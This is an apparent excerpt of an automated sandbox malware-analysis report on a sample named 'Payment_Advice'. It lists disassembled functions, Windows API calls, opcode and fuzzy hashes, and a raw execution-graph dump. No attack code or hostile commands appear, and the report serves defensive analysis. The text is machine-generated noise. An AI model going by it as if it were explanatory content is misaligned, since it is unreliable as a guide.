                                                                                                    Function 0052BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 005297E5: GetLastError.KERNEL32(?,00541098,00524674,00541098,?,?,005240EF,?,?,00541098), ref: 005297E9
                                                                                                      • Part of subcall function 005297E5: _free.LIBCMT ref: 0052981C
                                                                                                      • Part of subcall function 005297E5: SetLastError.KERNEL32(00000000,?,00541098), ref: 0052985D
                                                                                                      • Part of subcall function 005297E5: _abort.LIBCMT ref: 00529863
                                                                                                    • _abort.LIBCMT ref: 0052BB80
                                                                                                    • _free.LIBCMT ref: 0052BBB4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_abort_free
                                                                                                    • String ID: pS
                                                                                                    • API String ID: 289325740-3706138410
                                                                                                    • Opcode ID: 2f3fb8b422be33387bd60c781299339e25ccc193ea4d9222602d5c2637a934e3
                                                                                                    • Instruction ID: 78b0582b709611657d5519924c23ee75a43a0ae7f9ef02b0a2730c3b41150fe8
                                                                                                    • Opcode Fuzzy Hash: 2f3fb8b422be33387bd60c781299339e25ccc193ea4d9222602d5c2637a934e3
                                                                                                    • Instruction Fuzzy Hash: BC01D232D01632DBDB21AF68A40222DBFB1BF46B21B15010AF824A73D5CB346D419FC1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Malloc
                                                                                                    • String ID: (Q$ZQ
                                                                                                    • API String ID: 2696272793-758804005
                                                                                                    • Opcode ID: 4ec28dbae7e987cd159fd8c48784f2b055eb475d6fb4dc774040b5c54b2d2472
                                                                                                    • Instruction ID: ac635da68c130f9e69872afc1549243199d00621a9fd85dcd908030d6a4f3979
                                                                                                    • Opcode Fuzzy Hash: 4ec28dbae7e987cd159fd8c48784f2b055eb475d6fb4dc774040b5c54b2d2472
                                                                                                    • Instruction Fuzzy Hash: 070124B6600108BFEF059FA4DC49CEEBBADEF182547004159F906D7120E671AA48EBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00510FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00511101,?,?,0051117F,?,?,?,?,?,00511169), ref: 00510FEA
                                                                                                    • GetLastError.KERNEL32(?,?,0051117F,?,?,?,?,?,00511169), ref: 00510FF6
                                                                                                      • Part of subcall function 00506C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00506C54
                                                                                                    Strings
                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00510FFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                    • Opcode ID: e6960048b1456675615e28d65f77d9dfeb3f875a374f6f6e13bc875da92fb780
                                                                                                    • Instruction ID: 2b34cc5a235c2414c60f60b3d8868993fc2dbc38f1e0d243ce89fdd732a29114
                                                                                                    • Opcode Fuzzy Hash: e6960048b1456675615e28d65f77d9dfeb3f875a374f6f6e13bc875da92fb780
                                                                                                    • Instruction Fuzzy Hash: 27D02E329089313BE7203324AC0ECAE3D04FB62332F200B04F139622E2CA244DD56A96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0050DA55,?), ref: 0050E2A3
                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0050DA55,?), ref: 0050E2B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindHandleModuleResource
                                                                                                    • String ID: RTL
                                                                                                    • API String ID: 3537982541-834975271
                                                                                                    • Opcode ID: 16b8ea94ca86e60bf92892813cca4a592905857a2518451cd124933814bf5765
                                                                                                    • Instruction ID: ab8953d44794e6dd8d95200373294565fad5e4a50807ad7ca52fafe2a48355dd
                                                                                                    • Opcode Fuzzy Hash: 16b8ea94ca86e60bf92892813cca4a592905857a2518451cd124933814bf5765
                                                                                                    • Instruction Fuzzy Hash: C3C0123164071066EB352764AD4EB876E586B20B12F090848B281EE2D1DAA5C98896A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E467
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: UQ$zQ
                                                                                                    • API String ID: 1269201914-3645726421
                                                                                                    • Opcode ID: b161809464269b26a5ca6722982a8e60a1d691b290f1076aaa8d20720c3249b3
                                                                                                    • Instruction ID: d1299ead132e042cc18a8c6d4edad7f944445ed8455be94ca9f509cdd9bc23c5
                                                                                                    • Opcode Fuzzy Hash: b161809464269b26a5ca6722982a8e60a1d691b290f1076aaa8d20720c3249b3
                                                                                                    • Instruction Fuzzy Hash: 1BB012D1258001BC320415141D0BC771F0CF9C0F20730C52EFE01D0082DAC10EC70432
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E467
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: pQ$zQ
                                                                                                    • API String ID: 1269201914-780565824
                                                                                                    • Opcode ID: b7db74328c2463961b5086b2db19b408399f4627a5070c4cf52bb44ef02502f7
                                                                                                    • Instruction ID: 92246cea67fc45063369d4111d4bc7324a36b0301fd6cb626343c353c93ed5a0
                                                                                                    • Opcode Fuzzy Hash: b7db74328c2463961b5086b2db19b408399f4627a5070c4cf52bb44ef02502f7
                                                                                                    • Instruction Fuzzy Hash: 08B012C1659042BC3204D1181C0BC770E4CF8C0B60730842EFC05C1081DAC04CC70532
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:3.8%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:1.6%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:81
                                                                                                    execution_graph 97129 1ce6dd 97130 1ce68a 97129->97130 97133 1de753 SHGetFolderPathW 97130->97133 97136 1784b7 97133->97136 97135 1ce693 97137 1b65bb 97136->97137 97138 1784c7 _wcslen 97136->97138 97167 1796d9 97137->97167 97141 178502 97138->97141 97142 1784dd 97138->97142 97140 1b65c4 97140->97140 97149 19016b 97141->97149 97148 178894 8 API calls 97142->97148 97145 17850e 97158 19019b 97145->97158 97146 1784e5 __fread_nolock 97146->97135 97148->97146 97150 190170 ___std_exception_copy 97149->97150 97151 19018a 97150->97151 97154 19018c 97150->97154 97171 19523d 7 API calls 2 library calls 97150->97171 97151->97145 97153 1909fd 97173 193634 RaiseException 97153->97173 97154->97153 97172 193634 RaiseException 97154->97172 97156 190a1a 97156->97145 97159 19016b ___std_exception_copy 97158->97159 97160 19018a 97159->97160 97163 19018c 97159->97163 97174 19523d 7 API calls 2 library calls 97159->97174 97160->97146 97162 1909fd 97176 193634 RaiseException 97162->97176 97163->97162 97175 193634 RaiseException 97163->97175 97165 190a1a 97165->97146 97168 1796e7 97167->97168 97170 1796f0 __fread_nolock 97167->97170 97168->97170 97177 17c269 97168->97177 97170->97140 97171->97150 97172->97153 97173->97156 97174->97159 97175->97162 97176->97165 97178 17c27c 97177->97178 97182 17c279 __fread_nolock 97177->97182 97179 19016b 8 API calls 97178->97179 97180 17c287 97179->97180 97181 19019b 8 API calls 97180->97181 97181->97182 97182->97170 100090 171033 100095 176686 100090->100095 100094 171042 100096 17bf07 8 API calls 100095->100096 100097 1766f4 100096->100097 100103 1755cc 100097->100103 100099 176791 100100 171038 100099->100100 100106 1768e6 8 API calls __fread_nolock 100099->100106 100102 190433 29 API calls __onexit 100100->100102 100102->100094 100107 1755f8 100103->100107 100106->100099 100108 1755eb 100107->100108 100109 175605 100107->100109 100108->100099 100109->100108 100110 17560c RegOpenKeyExW 100109->100110 100110->100108 100111 175626 RegQueryValueExW 100110->100111 100112 17565c RegCloseKey 100111->100112 100113 175647 100111->100113 100112->100108 100113->100112 100114 1c64f9 100115 19016b 8 API calls 100114->100115 100116 1c6500 100115->100116 100117 19019b 8 API calls 100116->100117 100119 1c6519 __fread_nolock 100116->100119 100117->100119 100118 19019b 8 API calls 100120 1c653e 100118->100120 100119->100118 97183 17b810 97192 1791c7 97183->97192 97185 17b821 97190 17b84b 97185->97190 97200 17bc9b 97185->97200 97186 17bb3d 8 API calls 97191 17b60e 97186->97191 97190->97186 97212 17bceb 97192->97212 97194 1b6bfc 97218 1d9f71 83 API calls __wsopen_s 97194->97218 97196 179224 97196->97185 97197 1791d6 97197->97194 97197->97196 97199 17acc0 8 API calls 97197->97199 97198 1b6c0a 97199->97197 97201 17bcab 97200->97201 97202 19016b 8 API calls 97201->97202 97203 17b83f 97202->97203 97204 17bb3d 97203->97204 97205 17bbc7 97204->97205 97211 17bb4d __fread_nolock 97204->97211 97207 19019b 8 API calls 97205->97207 97206 19016b 8 API calls 97208 17bb54 97206->97208 97207->97211 97209 17bb72 97208->97209 97210 19016b 8 API calls 97208->97210 97209->97190 97210->97209 97211->97206 97213 17bd05 97212->97213 97214 17bcf8 97212->97214 97215 19016b 8 API calls 97213->97215 97214->97197 97216 17bd0f 97215->97216 97217 19019b 8 API calls 97216->97217 97217->97214 97218->97198 100121 17f470 100124 189fa5 100121->100124 100123 17f47c 100125 189fc6 100124->100125 100130 18a023 100124->100130 100127 1802f0 230 API calls 100125->100127 100125->100130 100131 189ff7 100127->100131 100128 1c800f 100128->100128 100129 18a067 100129->100123 100130->100129 100133 1e3ef6 81 API calls __wsopen_s 100130->100133 100131->100129 100131->100130 100132 17be6d 8 API calls 100131->100132 100132->100130 100133->100128 97219 1994d1 97229 19e048 97219->97229 97223 1994de 97242 1a510a 97223->97242 97226 199508 97246 1a2d58 97226->97246 97228 199513 97252 19e051 97229->97252 97231 1994d9 97232 1a506a 97231->97232 97233 1a5076 ___scrt_is_nonwritable_in_current_image 97232->97233 97269 1a32ee EnterCriticalSection 97233->97269 97235 1a50ec 97270 1a5101 97235->97270 97237 1a5081 97237->97235 97239 1a50c0 DeleteCriticalSection 97237->97239 97273 19ea08 97237->97273 97238 1a50f8 __fread_nolock 97238->97223 97241 1a2d58 _free 20 API calls 97239->97241 97241->97237 97243 1a5120 97242->97243 97244 1994ed DeleteCriticalSection 97242->97244 97243->97244 97245 1a2d58 _free 20 API calls 97243->97245 97244->97223 97244->97226 97245->97244 97247 1a2d63 RtlFreeHeap 97246->97247 97251 1a2d8c __dosmaperr 97246->97251 97248 1a2d78 97247->97248 97247->97251 97397 19f669 20 API calls __dosmaperr 97248->97397 97250 1a2d7e GetLastError 97250->97251 97251->97228 97253 19e05d ___scrt_is_nonwritable_in_current_image 97252->97253 97262 1a32ee EnterCriticalSection 97253->97262 97255 19e100 97263 19e120 97255->97263 97256 19e06c 97256->97255 97261 19e001 66 API calls 97256->97261 97266 19951d EnterCriticalSection 97256->97266 97267 19e0f6 LeaveCriticalSection __fread_nolock 97256->97267 97259 19e10c __fread_nolock 97259->97231 97261->97256 97262->97256 97268 1a3336 LeaveCriticalSection 97263->97268 97265 19e127 97265->97259 97266->97256 97267->97256 97268->97265 97269->97237 97286 1a3336 LeaveCriticalSection 97270->97286 97272 1a5108 97272->97238 97274 19ea14 ___scrt_is_nonwritable_in_current_image 97273->97274 97275 19ea3a 97274->97275 97276 19ea25 97274->97276 97285 19ea35 __fread_nolock 97275->97285 97287 19951d EnterCriticalSection 97275->97287 97304 19f669 20 API calls __dosmaperr 97276->97304 97278 19ea2a 97305 1a2b7c 26 API calls pre_c_initialization 97278->97305 97281 19ea56 97288 19e992 97281->97288 97283 19ea61 97306 19ea7e LeaveCriticalSection __fread_nolock 97283->97306 97285->97237 97286->97272 97287->97281 97289 19e99f 97288->97289 97290 19e9b4 97288->97290 97335 19f669 20 API calls __dosmaperr 97289->97335 97302 19e9af 97290->97302 97307 19df9b 97290->97307 97293 19e9a4 97336 1a2b7c 26 API calls pre_c_initialization 97293->97336 97296 1a510a 20 API calls 97297 19e9d0 97296->97297 97313 19dce5 97297->97313 97299 19e9d6 97320 1a89bf 97299->97320 97302->97283 97303 1a2d58 _free 20 API calls 97303->97302 97304->97278 97305->97285 97306->97285 97308 19dfaf 97307->97308 97309 19dfb3 97307->97309 97308->97296 97309->97308 97310 19dce5 __fread_nolock 26 API calls 97309->97310 97311 19dfd3 97310->97311 97337 1a5d4e 62 API calls 5 library calls 97311->97337 97314 19dcf1 97313->97314 97315 19dd06 97313->97315 97338 19f669 20 API calls __dosmaperr 97314->97338 97315->97299 97317 19dcf6 97339 1a2b7c 26 API calls pre_c_initialization 97317->97339 97319 19dd01 97319->97299 97321 1a89ce 97320->97321 97322 1a89e3 97320->97322 97343 19f656 20 API calls __dosmaperr 97321->97343 97324 1a8a1e 97322->97324 97328 1a8a0a 97322->97328 97345 19f656 20 API calls __dosmaperr 97324->97345 97325 1a89d3 97344 19f669 20 API calls __dosmaperr 97325->97344 97340 1a8997 97328->97340 97329 1a8a23 97346 19f669 20 API calls __dosmaperr 97329->97346 97332 1a8a2b 97347 1a2b7c 26 API calls pre_c_initialization 97332->97347 97333 19e9dc 97333->97302 97333->97303 97335->97293 97336->97302 97337->97308 97338->97317 97339->97319 97348 1a8915 97340->97348 97342 1a89bb 97342->97333 97343->97325 97344->97333 97345->97329 97346->97332 97347->97333 97349 1a8921 ___scrt_is_nonwritable_in_current_image 97348->97349 97359 1a54d7 EnterCriticalSection 97349->97359 97351 1a892f 97352 1a8961 97351->97352 97353 1a8956 97351->97353 97375 19f669 20 API calls __dosmaperr 97352->97375 97360 1a8a3e 97353->97360 97356 1a895c 97376 1a898b LeaveCriticalSection __wsopen_s 97356->97376 97358 1a897e __fread_nolock 97358->97342 97359->97351 97377 1a5754 97360->97377 97362 1a8a4e 97363 1a8a54 97362->97363 97365 1a8a86 97362->97365 97367 1a5754 __wsopen_s 26 API calls 97362->97367 97390 1a56c3 21 API calls 2 library calls 97363->97390 97365->97363 97368 1a5754 __wsopen_s 26 API calls 97365->97368 97366 1a8aac 97370 1a8ace 97366->97370 97391 19f633 20 API calls __dosmaperr 97366->97391 97371 1a8a7d 97367->97371 97369 1a8a92 FindCloseChangeNotification 97368->97369 97369->97363 97372 1a8a9e GetLastError 97369->97372 97370->97356 97374 1a5754 __wsopen_s 26 API calls 97371->97374 97372->97363 97374->97365 97375->97356 97376->97358 97378 1a5761 97377->97378 97379 1a5776 97377->97379 97392 19f656 20 API calls __dosmaperr 97378->97392 97383 1a579b 97379->97383 97394 19f656 20 API calls __dosmaperr 97379->97394 97382 1a5766 97393 19f669 20 API calls __dosmaperr 97382->97393 97383->97362 97384 1a57a6 97395 19f669 20 API calls __dosmaperr 97384->97395 97387 1a576e 97387->97362 97388 1a57ae 97396 1a2b7c 26 API calls pre_c_initialization 97388->97396 97390->97366 97391->97370 97392->97382 97393->97387 97394->97384 97395->97388 97396->97387 97397->97250 97398 1a8792 97403 1a854e 97398->97403 97401 1a87ba 97408 1a857f try_get_first_available_module 97403->97408 97405 1a877e 97427 1a2b7c 26 API calls pre_c_initialization 97405->97427 97407 1a86d3 97407->97401 97415 1b0d24 97407->97415 97411 1a86c8 97408->97411 97418 19919b 97408->97418 97411->97407 97426 19f669 20 API calls __dosmaperr 97411->97426 97412 19919b 40 API calls 97413 1a873b 97412->97413 97413->97411 97414 19919b 40 API calls 97413->97414 97414->97411 97431 1b0421 97415->97431 97417 1b0d3f 97417->97401 97419 19923b 97418->97419 97420 1991af 97418->97420 97430 199253 40 API calls 4 library calls 97419->97430 97425 1991d1 97420->97425 97428 19f669 20 API calls __dosmaperr 97420->97428 97423 1991c6 97429 1a2b7c 26 API calls pre_c_initialization 97423->97429 97425->97411 97425->97412 97426->97405 97427->97407 97428->97423 97429->97425 97430->97425 97434 1b042d ___scrt_is_nonwritable_in_current_image 97431->97434 97432 1b043b 97489 19f669 20 API calls __dosmaperr 97432->97489 97434->97432 97436 1b0474 97434->97436 97435 1b0440 97490 1a2b7c 26 API calls pre_c_initialization 97435->97490 97442 1b09fb 97436->97442 97441 1b044a __fread_nolock 97441->97417 97492 1b07cf 97442->97492 97445 1b0a2d 97524 19f656 20 API calls __dosmaperr 97445->97524 97446 1b0a46 97510 1a55b1 97446->97510 97449 1b0a32 97525 19f669 20 API calls __dosmaperr 97449->97525 97450 1b0a4b 97451 1b0a6b 97450->97451 97452 1b0a54 97450->97452 97523 1b073a CreateFileW 97451->97523 97526 19f656 20 API calls __dosmaperr 97452->97526 97456 1b0498 97491 1b04c1 LeaveCriticalSection __wsopen_s 97456->97491 97457 1b0a59 97527 19f669 20 API calls __dosmaperr 97457->97527 97458 1b0b21 GetFileType 97461 1b0b2c GetLastError 97458->97461 97462 1b0b73 97458->97462 97460 1b0af6 GetLastError 97529 19f633 20 API calls __dosmaperr 97460->97529 97530 19f633 20 API calls __dosmaperr 97461->97530 97532 1a54fa 21 API calls 2 library calls 97462->97532 97463 1b0aa4 97463->97458 97463->97460 97528 1b073a CreateFileW 97463->97528 97467 1b0b3a CloseHandle 97467->97449 97470 1b0b63 97467->97470 97469 1b0ae9 97469->97458 97469->97460 97531 19f669 20 API calls __dosmaperr 97470->97531 97471 1b0b94 97473 1b0be0 97471->97473 97533 1b094b 72 API calls 3 library calls 97471->97533 97478 1b0c0d 97473->97478 97534 1b04ed 72 API calls 4 library calls 97473->97534 97474 1b0b68 97474->97449 97477 1b0c06 97477->97478 97479 1b0c1e 97477->97479 97480 1a8a3e __wsopen_s 29 API calls 97478->97480 97479->97456 97481 1b0c9c CloseHandle 97479->97481 97480->97456 97535 1b073a CreateFileW 97481->97535 97483 1b0cc7 97484 1b0cfd 97483->97484 97485 1b0cd1 GetLastError 97483->97485 97484->97456 97536 19f633 20 API calls __dosmaperr 97485->97536 97487 1b0cdd 97537 1a56c3 21 API calls 2 library calls 97487->97537 97489->97435 97490->97441 97491->97441 97493 1b07f0 97492->97493 97494 1b080a 97492->97494 97493->97494 97545 19f669 20 API calls __dosmaperr 97493->97545 97538 1b075f 97494->97538 97497 1b07ff 97546 1a2b7c 26 API calls pre_c_initialization 97497->97546 97499 1b0842 97500 1b0871 97499->97500 97547 19f669 20 API calls __dosmaperr 97499->97547 97507 1b08c4 97500->97507 97549 19da9d 26 API calls 2 library calls 97500->97549 97503 1b08bf 97505 1b093e 97503->97505 97503->97507 97504 1b0866 97548 1a2b7c 26 API calls pre_c_initialization 97504->97548 97550 1a2b8c 11 API calls _abort 97505->97550 97507->97445 97507->97446 97509 1b094a 97511 1a55bd ___scrt_is_nonwritable_in_current_image 97510->97511 97553 1a32ee EnterCriticalSection 97511->97553 97513 1a55e9 97557 1a5390 97513->97557 97514 1a55c4 97514->97513 97519 1a5657 EnterCriticalSection 97514->97519 97521 1a560b 97514->97521 97517 1a5634 __fread_nolock 97517->97450 97520 1a5664 LeaveCriticalSection 97519->97520 97519->97521 97520->97514 97554 1a56ba 97521->97554 97523->97463 97524->97449 97525->97456 97526->97457 97527->97449 97528->97469 97529->97449 97530->97467 97531->97474 97532->97471 97533->97473 97534->97477 97535->97483 97536->97487 97537->97484 97540 1b0777 97538->97540 97539 1b0792 97539->97499 97540->97539 97551 19f669 20 API calls __dosmaperr 97540->97551 97542 1b07b6 97552 1a2b7c 26 API calls pre_c_initialization 97542->97552 97544 1b07c1 97544->97499 97545->97497 97546->97494 97547->97504 97548->97500 97549->97503 97550->97509 97551->97542 97552->97544 97553->97514 97565 1a3336 LeaveCriticalSection 97554->97565 97556 1a56c1 97556->97517 97566 1a500d 97557->97566 97559 1a53af 97561 1a2d58 _free 20 API calls 97559->97561 97560 1a53a2 97560->97559 97573 1a3795 11 API calls 2 library calls 97560->97573 97563 1a5401 97561->97563 97563->97521 97564 1a54d7 EnterCriticalSection 97563->97564 97564->97521 97565->97556 97571 1a501a pre_c_initialization 97566->97571 97567 1a505a 97575 19f669 20 API calls __dosmaperr 97567->97575 97568 1a5045 RtlAllocateHeap 97569 1a5058 97568->97569 97568->97571 97569->97560 97571->97567 97571->97568 97574 19523d 7 API calls 2 library calls 97571->97574 97573->97560 97574->97571 97575->97569 100134 1c55f4 100143 18e34f 100134->100143 100136 1c560a 100138 1c5685 100136->100138 100152 18a9e5 9 API calls 100136->100152 100141 1c617b 100138->100141 100154 1e3ef6 81 API calls __wsopen_s 100138->100154 100140 1c5665 100140->100138 100153 1e2393 8 API calls 100140->100153 100144 18e35d 100143->100144 100145 18e370 100143->100145 100146 17b3fe 8 API calls 100144->100146 100147 18e3a3 100145->100147 100148 18e375 100145->100148 100151 18e367 100146->100151 100149 17b3fe 8 API calls 100147->100149 100150 19016b 8 API calls 100148->100150 100149->100151 100150->100151 100151->100136 100152->100140 100153->100138 100154->100141 100155 18f9b1 100156 18f9bb 100155->100156 100157 18f9dc 100155->100157 100164 17c34b 100156->100164 100162 1cfadc 100157->100162 100172 1d55d9 8 API calls messages 100157->100172 100159 18f9cb 100161 17c34b 8 API calls 100159->100161 100163 18f9db 100161->100163 100165 17c359 100164->100165 100171 17c381 messages 100164->100171 100166 17c367 100165->100166 100167 17c34b 8 API calls 100165->100167 100168 17c36d 100166->100168 100169 17c34b 8 API calls 100166->100169 100167->100166 100170 17c780 8 API calls 100168->100170 100168->100171 100169->100168 100170->100171 100171->100159 100172->100157 100173 17367c 100176 173696 100173->100176 100177 1736ad 100176->100177 100178 1736b2 100177->100178 100179 173711 100177->100179 100220 17370f 100177->100220 100182 1736bf 100178->100182 100183 17378b PostQuitMessage 100178->100183 100180 173717 100179->100180 100181 1b3dce 100179->100181 100185 173743 SetTimer RegisterWindowMessageW 100180->100185 100186 17371e 100180->100186 100232 172f24 10 API calls 100181->100232 100187 1b3e3b 100182->100187 100188 1736ca 100182->100188 100190 173690 100183->100190 100184 1736f6 DefWindowProcW 100184->100190 100185->100190 100193 17376c CreatePopupMenu 100185->100193 100191 173727 KillTimer 100186->100191 100192 1b3d6f 100186->100192 100237 1dc80c 65 API calls ___scrt_fastfail 100187->100237 100194 173795 100188->100194 100195 1736d4 100188->100195 100228 17388e Shell_NotifyIconW ___scrt_fastfail 100191->100228 100198 1b3daa MoveWindow 100192->100198 100199 1b3d74 100192->100199 100193->100190 100221 18fcbb 